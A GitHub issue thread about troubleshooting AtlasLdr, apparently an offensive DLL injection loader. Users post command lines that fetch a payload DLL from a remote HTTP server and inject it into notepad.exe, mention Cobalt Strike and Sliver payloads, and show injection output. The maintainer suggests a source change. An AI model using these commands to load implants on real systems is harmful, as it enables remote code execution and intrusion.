### ISSUE TITLE
Error receiving the response: 12030

### ISSUE THREAD

**Issue by johnjohnsp1** [Krypteria/AtlasLdr#1]
Hi,
thanks for sharing the code.
I gave it a shot but getting those errors once executed:

PS C:\temp> .\atlas_x64.exe notepad.exe 1 10.22.22.9 8888 .\atlas_patcher.dll i.dll isfine
[*] - PID of the target process: 7632

[*] - Establishing the connection to the server
[!] - Error in WinHttpQueryDataAvailable: 12030
PS C:\temp> .\atlas_x64.exe notepad.exe 0 10.22.22.9 8888 .\atlas_patcher.dll i.dll isfine
[*] - PID of the target process: 7632

[*] - Establishing the connection to the server
[!] - Error receiving the response: 12030

meanwhile server side:

10.0.1.97 - - [22/Mar/2024 10:44:27] "GET /i.dll HTTP/1.1" 200 -
Exception occurred during processing of request from ('10.0.1.97', 57977)
Traceback (most recent call last):
File */usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self. finish_request(request, client_address)
File "/usr/lib/python3.11/http/server.py™, line 1310, in finish_request self. RequestHandlerClass(request, client_address, self,
File "/usr/lib/python3.11/http/server.py", line 671, in _init_ super)..
init
_(*args, **kwargs)
File
"/usr/lib/python3.11/socketserver.py", line 755, in _init_ self.handle@
File "/usr/lib/python3,11/http/server.py", line 436, in handle self. handle_one_requesto
File
"/usr/lib/python3.11/http/server.py", line 424, in handle_one_request method
File
*/usr/lib/python3.11/http/server.py", line 678, in do_GET self.copyfile(f, self.wfile)
File "/usr/lib/python3.11/http/server-py", line 877, in copyfile shutil.copyfileobj(source, outputfile)
File "/usr/lib/python3.11/shutil.py", line 200, in copyfileobj fdst_write(buf)
File
"/usr/lib/python3.11/socketserver.py", line 834, in write self._sock. sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

compiled from Kali box and tested with a cobalt strike payload dll on a windows 10 box 
I miss something or did something wrong ?

thanks

**Comment by Krypteria** [comment]
Hi John, 

Usually, the error 12030 on winhttp i due a SSL incompatibility, the current version of AtlasLdr only allows to use plain HTTP, HTTPS is currently not supported. 

How are you launching your server?

**Comment by johnjohnsp1** [comment]
thanks for the reply,
for the server part I use python3 -m http.server 8888

**Comment by johnjohnsp1** [comment]
tried with apache2 instead
PS C:\temp> .\atlas_x64.exe notepad.exe 0 10.22.22.9 80 .\atlas_patcher.dll i.dll isfine
[*] - PID of the target process: 7632

[*] - Establishing the connection to the server
[!] - DLL not found in the server: -1
PS C:\temp> .\atlas_x64.exe notepad.exe 1 10.22.22.9 80 .\atlas_patcher.dll i.dll isfine
[*] - PID of the target process: 7632

[*] - Establishing the connection to the server
[!] - Error receiving the response: 12030

server side
10.0.1.97 - - [22/Mar/2024:11:14:51 +0100] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C hrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0"
10.0.1.97
- [22/Mar/2024:11:14:51 +0100] "GET /icons/openlogo-75.png HTTP/1.1" 200 6040 "http://10.22.22.9/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Ap
pleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0"
10.0.1.97 - - [22/Mar/2024:11:14:51 0100] "GET /favicon.ico HTTP/1.1" 404 488
"http://10.22.22.9/™ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5
37.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0*
10.0.1.97 - - 22/Mar/2024:11:14:56 +0100]
"GET /i.dll HTTP/1.1" 200 137240 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like G
ecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0"
10.0.1.97 - - 22/Mar/2024:11:14:56 +0100]
"GET /login/css/latofonts.css HTTP/1.1" 404 489 "http://10.22.22.9/i.dll" "Mozilla/5.0 (Windows NT 10.0; Win64; x
64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0"
10.0.1.97 - - [22/Mar/2024:11:15:12 +0100] "GET /i.dll HTTP/1.1"
200 143080
10.0.1.97 - - [22/Mar/2024:11:15:48 0100] "-" 408 0 "-"
"-"
"-" "Mozilla/5.0"
10.0.1.97 - - [22/Mar/2024:11:16:06 0100] "GET /i.dll HTTP/1.1" 200 143080 "-" "Mozilla/5.0"

different error code

**Comment by Krypteria** [comment]
thanks for the information, I'll have a look at it these days.

what is the size of the DLL you are trying to inject?

**Comment by Xenorli** [comment]
C:\Users\0xCD\Downloads>atlas_x64.exe notepad.exe 0 192.168.1.90 8080 atlas_patcher.dll test.dll run
[*] - PID of the target process: 3068

[*] - Establishing the connection to the server
        [+] - test.dll obtained correctly
[*] - Establishing the connection to the server
        [+] - atlas_patcher.dll obtained correctly

[~] - Mapping test.dll - [~]

        [*] - Mapping sections
        [+] - Sections mapped

        [*] - Fixing relocations
        [+] - Relocations fixed

        [*] - Changing memory protection
        [+] - Memory protection changed

[~] - test.dll mapped at 000001a1f0750000 - [~]

[~] - Mapping atlas_patcher.dll - [~]

        [*] - Mapping sections
        [+] - Sections mapped

        [*] - Patching IAT
                [*] - Fixing DLL: KERNEL32.dll
                [*] - Fixing DLL: api-ms-win-crt-convert-l1-1-0.dll
                [*] - Fixing DLL: api-ms-win-crt-environment-l1-1-0.dll
                [*] - Fixing DLL: api-ms-win-crt-heap-l1-1-0.dll
                [*] - Fixing DLL: api-ms-win-crt-private-l1-1-0.dll
                [*] - Fixing DLL: api-ms-win-crt-runtime-l1-1-0.dll
                [*] - Fixing DLL: api-ms-win-crt-stdio-l1-1-0.dll
                [*] - Fixing DLL: api-ms-win-crt-string-l1-1-0.dll
                [*] - Fixing DLL: api-ms-win-crt-time-l1-1-0.dll
        [+] - IAT patched

        [*] - Fixing relocations
        [+] - Relocations fixed

        [*] - Changing memory protection
        [+] - Memory protection changed

[~] - atlas_patcher.dll mapped at 000001a1f0760000 - [~]

[*] - Executing atlas_patcher.dll to patch test.dll IAT
        [+] - Remote thread executed at 000001a1f07615e1

[+] - test.dll IAT patched
[*] - Executing test.dll entrypoint
[+] - test.dll entrypoint executed

==================================================================================

looks like all goods but still idk why Putty.exe is not opend

**Comment by Krypteria** [comment]
Hi again @johnjohnsp1 I just realised that you have an error in the way you are using atlas. atlas_patcher.dll must be on the remote server as well as the dll you are trying to inject, you are trying to load atlas_patcher locally and that is not possible. Here is an usage  example using Sliver.

![image](https://github.com/Krypteria/AtlasLdr/assets/55555187/b78f78f4-cee6-4b74-809f-795f1b67fbfb)
![image](https://github.com/Krypteria/AtlasLdr/assets/55555187/dd1a141e-efee-4cd3-8247-ca93d4163608)

**Comment by johnjohnsp1** [comment]
thanks for the reply,
I did a test with having the atlas_patcher.dll and my dll inside the same folder, but sadly I keep getting the same error.
Once executed the atlas_x64.exe seems on the remote server the atlas dll is not getting retrieved but instead just only my dll is called.
on the server side same error.

surely is something on my environment that is not working
maybe I didn't compile it on windows but on kali box ? probably different mingw versions

really appreciate the help
![Screenshot 2024-03-25 alle 09 50 57](https://github.com/Krypteria/AtlasLdr/assets/1888855/efe17c0b-5a58-4e51-b0c3-27838f6aa869)
<img width="987" alt="Screenshot 2024-03-25 alle 09 51 05" src="https://github.com/Krypteria/AtlasLdr/assets/1888855/7721ddc1-e9d8-45db-9fdb-bc535ecb85a6">

**Comment by Xenorli** [comment]
> thanks for the reply, I did a test with having the atlas_patcher.dll and my dll inside the same folder, but sadly I keep getting the same error. Once executed the atlas_x64.exe seems on the remote server the atlas dll is not getting retrieved but instead just only my dll is called. on the server side same error.
> 
> surely is something on my environment that is not working maybe I didn't compile it on windows but on kali box ? probably different mingw versions
> 
> really appreciate the help ![Screenshot 2024-03-25 alle 09 50 57](https://private-user-images.githubusercontent.com/1888855/316441722-efe17c0b-5a58-4e51-b0c3-27838f6aa869.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTEzNjMxMDMsIm5iZiI6MTcxMTM2MjgwMywicGF0aCI6Ii8xODg4ODU1LzMxNjQ0MTcyMi1lZmUxN2MwYi01YTU4LTRlNTEtYjBjMy0yNzgzOGY2YWE4NjkucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDMyNSUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDAzMjVUMTAzMzIzWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9Yzc4MGI2YzFkNGVjZjVjNDQ5ZWI0ODBhN2RmYTcyYzVjN2NjMjgxYmM0M2M3ODcwNDAxNTkwZDE2Mzc0Zjc4MyZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.JsaTOxXbEjkAKnJwC0b0Cmoq-taz6S4i1QmXWlLCSa4) <img alt="Screenshot 2024-03-25 alle 09 51 05" width="987" src="https://private-user-images.githubusercontent.com/1888855/316441731-7721ddc1-e9d8-45db-9fdb-bc535ecb85a6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MTEzNjMxMDMsIm5iZiI6MTcxMTM2MjgwMywicGF0aCI6Ii8xODg4ODU1LzMxNjQ0MTczMS03NzIxZGRjMS1lOWQ4LTQ1ZGItOWZkYi1iYzUzNWVjYjg1YTYucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQVZDT0RZTFNBNTNQUUs0WkElMkYyMDI0MDMyNSUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyNDAzMjVUMTAzMzIzWiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9ZGE5ZjgzOTFjNDE4YjY3MTU4YTliMTIxNGJiYTUxMmVjOWU0ZTY3YWU2YmRhZTdkY2Y1ZDI1ODkxYmExZTg2YyZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.PMXOIapxjThbGE77rhkl5oIH8uLuTFyQMLkvH0oPr2o">

use i.dll, isfine

**Comment by johnjohnsp1** [comment]
sadly won't work even with i.dll, is fine
problem is the atlas_patcher.dll is not appearing during the call of the i.dll
even with a exe file the problem is the same the GET point just at the payload and not the atals_patcher.dll

trying to figure out why don't work, also tried to delete, git clone the repo and build again ... nothing sadly

**Comment by Krypteria** [comment]
Hi @johnjohnsp1, since I am not able to replicate your problem, could you do the following test?

1. Go to /AtlasLdr/src/AtlasLdr.cpp
2. Change the order of lines 47 - 48, you should put this:

char* atlasPatcher_buffer = ObtainRock(atlas_params.server, atoi(atlas_params.port), atlas_params.atlasPatcher);
char* dll_buffer = ObtainRock(atlas_params.server, atoi(atlas_params.port), atlas_params.dll);

instead of:

char* dll_buffer = ObtainRock(atlas_params.server, atoi(atlas_params.port), atlas_params.dll);
char* atlasPatcher_buffer = ObtainRock(atlas_params.server, atoi(atlas_params.port), atlas_params.atlasPatcher);

try again with this change (compile before trying) 

If this fails to retrieve atlas_patcher.dll, it could be an issue in your network

**Comment by johnjohnsp1** [comment]
same error but after the change I've made, recompiled and tested the dll being called is the atlas_patcher.dll instead the payload i.dll
<img width="999" alt="Screenshot 2024-03-25 alle 12 14 54" src="https://github.com/Krypteria/AtlasLdr/assets/1888855/e94537e2-8091-4f91-aa5e-d6ec2e1c456d">

![Screenshot 2024-03-25 alle 12 13 04](https://github.com/Krypteria/AtlasLdr/assets/1888855/a41ab529-5f0d-4d27-902b-daab40b22d98)

I really think on a network issue, thanks much for the help, really appreciate

**Comment by Krypteria** [comment]
Yeah, seems like a weird network problem, for the moment i will close this issue as it looks like is not a Atlas problem, feel free to open another one if you get other problem.

Also, thank you for taking the time to use Atlas

**Comment by Krypteria** [comment]
Yeah, seems like a weird network problem, for the moment i will close this issue as it looks like is not a Atlas problem, feel free to open another one if you get other problem.

Also, thank you for taking the time to use Atlas
